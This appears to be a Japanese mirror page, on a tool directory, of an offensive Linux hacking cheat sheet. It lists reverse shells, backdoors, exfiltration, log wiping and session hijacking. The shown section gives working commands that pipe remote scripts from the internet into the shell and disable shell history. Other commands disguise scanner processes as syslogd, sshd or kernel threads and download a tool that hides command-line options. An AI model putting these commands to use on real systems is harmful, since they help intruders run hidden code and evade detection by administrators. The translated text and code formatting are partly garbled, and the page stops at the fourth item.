Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
thc-tips-tricks-hacks-cheat-sheet — 各种技巧与窍门 | Kitploit
ツール/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (オープンソースインテリジェンス)永続化メカニズム横移動データ流出情報収集ポストエクスプロイトペネトレーションテストレッドチーミング厳選リソース

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ペイロード開発
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

各种技巧与窍门

リポジトリを見る
3.9k471543ヶ月前Kitploit レビュー済み

THCのお気に入りのヒント、トリック&ハック(チートシート)

https://thc.org/tips

私たちのお気に入りのトリック集です。これらのトリックの多くは私たちが作ったものではありません。私たちは単に収集しているだけです。

トリックは、なぜ機能するのかの説明なしに「そのまま」示します。仕組みと理由を理解するにはLinuxの知識が必要です。

トリックをお持ちですか? 参加してください https://thc.org/ops

  1. Bash
    1. ハックシェルをセットアップする
    2. コマンドを隠す
    3. コマンドラインオプションを隠す
    4. ネットワーク接続を隠す
    5. ユーザーとしてプロセスを隠す
    6. rootとしてプロセスを隠す
    7. スクリプトを隠す
    8. catから隠す
    9. ログファイルを分けて並列実行する
  2. SSH
    1. ほぼ不可視のSSH
    2. 1つのSSH/TCP接続で複数のシェル
    3. SSHトンネル
    4. SSH socks5トンネル
    5. NAT配下のホストへのSSH
    6. ProxyJumpによるSSHピボット
    7. ユーザーとしてSSHDを実行
  3. ネットワーク
    1. ホストを発見する
    2. Tcpdump
    3. トンネルとフォワーディング
      1. Raw TCPリバースポート
      2. HTTPSリバースフォワード
      3. iptablesでトラフィックをバウンスさせる
      4. ゴーストIP / IPスプーフィング
      5. その他
    4. SOCKSプロキシ経由で任意のツールを使用する
    5. 自分のパブリックIPアドレスを見つける
    6. 世界中からの到達可能性を確認する
    7. オープンポートの確認/スキャン
    8. パスワードハッシュをクラックする
    9. パスワード/鍵のブルートフォース
  4. データのアップロード/ダウンロード/外部持ち出し
    1. ファイルのエンコード/デコード
    2. カット&ペーストでファイル転送
    3. tmuxを使ったファイル転送
    4. screenを使ったファイル転送
    5. gs-netcatとsftpを使ったファイル転送
    6. HTTPを使ったファイル転送
    7. curlを使わないファイルダウンロード
    8. rsyncを使ったファイル転送
    9. 公開ダンプサイトへのファイル転送
    10. WebDAVを使ったファイル転送
    11. Telegramへのファイル転送
  5. リバースシェル / ダムシェル
    1. リバースシェル
      1. gs-netcat(暗号化)
      2. Bash
      3. cURL(暗号化)
      4. cURL(平文)
      5. OpenSSL(暗号化)
      6. remote.moe(暗号化)
      7. /dev/tcpなし
      8. Python
      9. Perl
      10. PHP
    2. ダムシェルのアップグレード
      1. リバースシェルをptyシェルにアップグレードする
      2. リバースシェルを完全インタラクティブシェルにアップグレードする
      3. socatを使ったリバースシェル(完全インタラクティブ)
  6. バックドア
    1. gs-netcat
    2. sshx.io
    3. 最小のSSHDバックドア
    4. ネットワーク全体へのリモートアクセス
    5. 最小のPHPバックドア
    6. 最小のリバースDNSトンネルバックドア
    7. ローカルrootバックドア
    8. 自己展開型インプラント
  7. ホスト偵察
  8. シェルハック
    1. ファイルをシュレッド(安全な削除)
    2. ファイルの日付を復元する
    3. ログファイルをクリーンアップする
    4. root権限のないユーザーからファイルを隠す
    5. ファイルを不変にする
    6. sudo/suを使わずにユーザーを切り替える
    7. ペイロードを難読化して暗号化する
    8. ファイルシステムに触れずにバックドアを展開する
  9. 暗号
    1. クイックなランダムパスワードを生成する
    2. Linuxで持ち運び可能な暗号化ファイルシステム
      1. cryptsetup
      2. EncFS
    3. ファイルの暗号化
  10. セッションのスニッフィングとハイジャック
    1. ユーザーのSHELLセッションをスニッフィングする
    2. dtraceで全てのSHELLセッションをスニッフィングする
    3. eBPFで全てのSHELLセッションをスニッフィングする
    4. straceでユーザーのSSHまたはSSHDセッションをスニッフィングする
    5. ラッパースクリプトでユーザーの発信SSHセッションをスニッフィングする
    6. SSH-ITでユーザーの発信SSHセッションをスニッフィングする
    7. 実行中のSSHセッションをハイジャック/乗っ取る
  11. VPNとシェル
    1. 使い捨てルートサーバー
    2. VPN/VPSプロバイダー
  12. OSINTインテリジェンス収集
  13. その他
    1. 定番ツール
    2. クールなLinuxコマンド
    3. tmuxチートシート
    4. 便利なコマンド
  14. ハッカーになる方法
  15. その他のサイト

1. Bash / シェル

1.i. ハックシェルをセットアップする(bash):

BASHをより静かにする。 ~/.bash_history と その他多くのものを無効にする。```sh source <(curl -SsfL https://thc.org/hs)

代替 URL:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

そして、curl/wget がない場合は、surl と、bin curl で (一時的に) インストールされた curl を使用します。```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

HackShellはもっと多くのことを行いますが、最も重要なのは次のとおりです:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

私たちは anew をよく使用しますが、これは簡単な回避策です:```shell xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } which anew &>/dev/null || alias anew=xanew

ボーナスヒント:
「 」(スペース)で始まるコマンドも、[履歴に記録されません](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces)。```
$  id

1.ii. コマンドを隠す / コマンドをデーモン化する

これはプロセス名のみを隠します。zapperを使用すると、コマンドラインオプションも隠せます。```shell (exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'

バックグラウンドで '/usr/sbin/sshd' として隠された 'nmap' を起動します:```
(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 &>nmap.log &)

GNU screen 内で開始:``` screen -dmS MyName nmap -Pn -F -n --open -oG - 10.0.2.1/24

Attach back to the nmap process

screen -x MyName

あるいは、バイナリを新しい名前にコピーしてください:```sh
cd /dev/shm
cp "$(command -v nmap)" syslogd
PATH=.:$PATH syslogd -Pn -F -n --open -oG - 10.0.2.1/24

またはバインドマウントを使用して、(一時的に) /sbin/init が代わりに /dev/shm/nmap を指すようにします:```shell mount -n --bind "$(command -v nmap)" /sbin/init

starting /sbin/init will instead execute nmap

(/sbin/init -Pn -f -n --open -oG - 10.0.2.1/24 &>nmap.log &)

<a id="zap"></a>
**1.iii. コマンドラインオプションを隠す**

[zapper](https://github.com/hackerschoice/zapper) を使用します:```sh
curl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) && \
chmod 755 zapper

Developer は、攻撃的セキュリティのための包括的なGitHub OPSECツールであり、環境とツール群を運用上安全にするのを支援するよう設計されています。```sh

Start Nmap but zap all options and show it as 'klog' in the process list:

./zapper -a klog nmap -Pn -F -n --open -oG - 10.0.0.1/24

Started as a daemon and sshd-style name:

(./zapper -a 'sshd: root@pts/0' nmap -Pn -F -n --open -oG - 10.0.0.1/24 &>nmap.log &)

Replace the existing shell with tmux (with 'exec').

Then start and hide tmux and all further processes - as some kernel process:

exec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux

<a id="bash-hide-connection"></a>
**1.iv. ネットワーク接続を隠す**
ツールをダウンロード